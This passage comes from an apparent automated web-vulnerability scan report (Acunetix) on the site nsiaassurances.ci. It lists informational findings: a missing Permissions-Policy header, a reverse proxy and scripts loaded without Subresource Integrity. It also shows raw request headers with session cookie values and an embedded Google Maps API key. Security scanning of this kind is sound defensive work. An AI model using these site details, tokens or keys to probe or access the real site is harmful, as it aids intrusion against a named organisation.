[email protected]

217
------------YWJkMTQzNDcw

Content-Disposition: form-data; name="name"

zFPWdwPk

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="user_picture[0][display]"

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="user_picture[0][fids]"

zFPWdwPk

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="user_picture_0_upload_button"

user_picture_0_upload_button=Upload

------------YWJkMTQzNDcw--


Permissions-Policy header not implemented

Severity Informational
Reported by module /httpdata/permissions_policy.js

Description

The Permissions-Policy header allows developers to selectively enable and disable use of various browser features and
APIs.

Impact

Recommendation

References

Permissions-Policy / Feature-Policy (MDN) (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy)

Permissions Policy (W3C) (https://www.w3.org/TR/permissions-policy-1/)

Affected items

Web Server

218
Details
Locations without Permissions-Policy header:

https://nsiaassurances.ci/en/node/28
https://nsiaassurances.ci/index.php/en/node/28
https://nsiaassurances.ci/fr/node/28
https://nsiaassurances.ci/index.php/pt/node/13
https://nsiaassurances.ci/en/node/19
https://nsiaassurances.ci/index.php/en/user/register
https://nsiaassurances.ci/pt/user/register
https://nsiaassurances.ci/cookies/documentation
https://nsiaassurances.ci/index.php/pt/node/28
https://nsiaassurances.ci/index.php/en/node/30
https://nsiaassurances.ci/core/themes/stable/images/core/icons/000000/
https://nsiaassurances.ci/index.php/user/login/
https://nsiaassurances.ci/fr/user/login
https://nsiaassurances.ci/fr/node/13
https://nsiaassurances.ci/index.php/user/register/
https://nsiaassurances.ci/index.php/fr/node/28
https://nsiaassurances.ci/index.php/pt/node/18
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/
https://nsiaassurances.ci/index.php/en/system/404
https://nsiaassurances.ci/fr/node/30
https://nsiaassurances.ci/pt/node/20

Request headers
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Reverse proxy detected

Severity Informational
Reported by module /target/RevProxy_Detection.js

Description

This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.

Impact

No impact is associated with this vulnerability.

219
Recommendation

None

Affected items

Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET / HTTP/1.1

Max-Forwards: 0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Subresource Integrity (SRI) not implemented

Severity Informational
Reported by module /RPA/SRI_Not_Implemented.js

Description

Subresource Integrity (SRI) is a security feature that enables browsers to verify that third-party resources they fetch (for
example, from a CDN) are delivered without unexpected manipulation. It works by allowing developers to provide a
cryptographic hash that a fetched file must match.

Third-party resources (such as scripts and stylesheets) can be manipulated. An attacker that has access or has hacked the
hosting CDN can manipulate or replace the files. SRI allows developers to specify a base64-encoded cryptographic hash of
the resource to be loaded. The integrity attribute containing the hash is then added to the <script> HTML element tag. The
integrity string consists of a base64-encoded hash, followed by a prefix that depends on the hash algorithm. This prefix can
either be sha256, sha384 or sha512.

The script loaded from the external URL specified in the Details section doesn't implement Subresource Integrity (SRI). It's
recommended to implement Subresource Integrity (SRI) for all the scripts loaded from external hosts.

Impact

An attacker that has access or has hacked the hosting CDN can manipulate or replace the files.

Recommendation

Use the SRI Hash Generator link (from the References section) to generate a <script> element that implements
Subresource Integrity (SRI).

220
For example, you can use the following <script> element to tell a browser that before executing the
https://example.com/example-framework.js script, the browser must first compare the script to the expected hash, and
verify that there's a match.

<script src="https://example.com/example-framework.js"

integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"

crossorigin="anonymous"></script>

References

Subresource Integrity (https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)

SRI Hash Generator (https://www.srihash.org/)

Affected items

Web Server
Details
Pages where SRI is not implemented:

https://nsiaassurances.ci/

Script SRC: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0/jquery.min.js

https://nsiaassurances.ci/

Script SRC: https://cdn.jsdelivr.net/gh/jfeltkamp/cookiesjsr@1/dist/cookiesjsr-preloader.min.js

Request headers
GET / HTTP/1.1

Referer: https://nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

/index.php/en/node/28
Details

221
Pages where SRI is not implemented:

https://nsiaassurances.ci/index.php/en/node/28

Script SRC: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0/jquery.min.js

https://nsiaassurances.ci/index.php/en/node/28

Script SRC: https://cdn.jsdelivr.net/gh/jfeltkamp/cookiesjsr@1/dist/cookiesjsr-preloader.min.js

Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

/node/22
Details
Pages where SRI is not implemented:

https://nsiaassurances.ci/node/22

Script SRC: https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css

https://nsiaassurances.ci/node/22

Script SRC: https://maps.googleapis.com/maps/api/js?


key=AIzaSyCXEbelF1oMjxsx6cXfmZspTS2LByzonX0&callback=initMap&libraries=&v=weekly

https://nsiaassurances.ci/node/22

Script SRC: https://unpkg.com/@googlemaps/markerclusterer/dist/index.min.js

Request headers

222
GET /node/22 HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=RP4yUamacBA19nHaUpqAsP64rOH9hsspNoHSMPb_xzY;
big_pipe_nojs=1;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

/pt/node/22
Details
Pages where SRI is not implemented:

https://nsiaassurances.ci/pt/node/22

Script SRC: https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css

https://nsiaassurances.ci/pt/node/22

Script SRC: https://maps.googleapis.com/maps/api/js?


key=AIzaSyCXEbelF1oMjxsx6cXfmZspTS2LByzonX0&callback=initMap&libraries=&v=weekly

https://nsiaassurances.ci/pt/node/22

Script SRC: https://unpkg.com/@googlemaps/markerclusterer/dist/index.min.js

Request headers

223
GET /pt/node/22 HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D; big_pipe_nojs=1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

224
Scanned items (coverage report)
https://nsiaassurances.ci/

https://nsiaassurances.ci/index.php/en/node/28

https://nsiaassurances.ci/index.php/pt/node/13

https://nsiaassurances.ci/node/22

https://nsiaassurances.ci/pt/node/22

225

You might also like